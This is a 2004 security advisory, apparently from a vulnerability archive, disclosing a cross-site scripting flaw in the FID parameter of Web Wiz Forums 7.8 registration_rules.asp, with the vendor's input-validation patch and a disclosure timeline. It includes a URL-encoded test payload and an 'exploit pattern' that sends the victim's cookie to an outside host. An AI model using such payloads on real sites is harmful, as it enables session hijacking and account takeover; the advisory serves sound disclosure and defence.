webwizXSS.txt

webwizXSS.txt: Posted Jun 18, 2004; Authored by Ferruh Mavituna | Site ferruh.mavituna.com; Web Wiz Forums version 7.8 is susceptible to a cross site scripting attack.; tags | advisory, web, xss; SHA-256 | fb95299c719e87d28e1135b8c3aef3ab5dcb36a4e9f359d4685af5c1f35642cd; Download | Favorite | View

webwizXSS.txt

------------------------------------------------------
WEB WIZ FORUMS REGISTRATION RULES XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?528

XSS / Cross Site Scripting attack allows an attacker to hijack other
users/administrators account.


------------------------------------------------------
ABOUT WEB WIZ FORUMS;
------------------------------------------------------
Web Wiz Forums, the free award winning ASP bulletin board system software,
can add value to almost any web site.

Whether you are building a small interactive community with 10 people or
over 100,000 strong customer support forum, this fast, scalable, bulletin
board engine can manage your community


URL & Demo & Source Code Download ;
http://www.webwizguide.info/web_wiz_forums/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.8 [possibly lower versions]


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.9


------------------------------------------------------
PROBLEM;
------------------------------------------------------
- Page
registration_rules.asp (Parameter : FID)

- Test;
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2
7%29%3C%2Fscript%3E

- Possible Exploit Pattern;
- This sample sends cookie to victim URL [in sample
http://ferruh.mavituna.com/xss/]
registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javasc
ript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2E
com%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E


------------------------------------------------------
HOW TO PATCH [provided by vendor];
------------------------------------------------------
Download http://www.zap2.me.uk/7.7a_and_7.8_to_7.9_patch_files.zip
Version 7.9 has been released to deal with this issue.
Change line 65 of the file registration_rules.asp that reads:-

intForumID = Request.QueryString("FID")

To the following:-

If isNumeric(Request.QueryString("FID")) Then
         intForumID = CInt(Request.QueryString("FID"))
Else
         intForumID = 0
End If




-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 14.06.2004
Vendor Informed : 15.06.2004
Published : 15.06.2004


------------------------------------------------------
Vendor Status;
------------------------------------------------------
Quickly answered & fixed.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

webwizXSS.txt

webwizXSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

webwizXSS.txt

Share This

webwizXSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems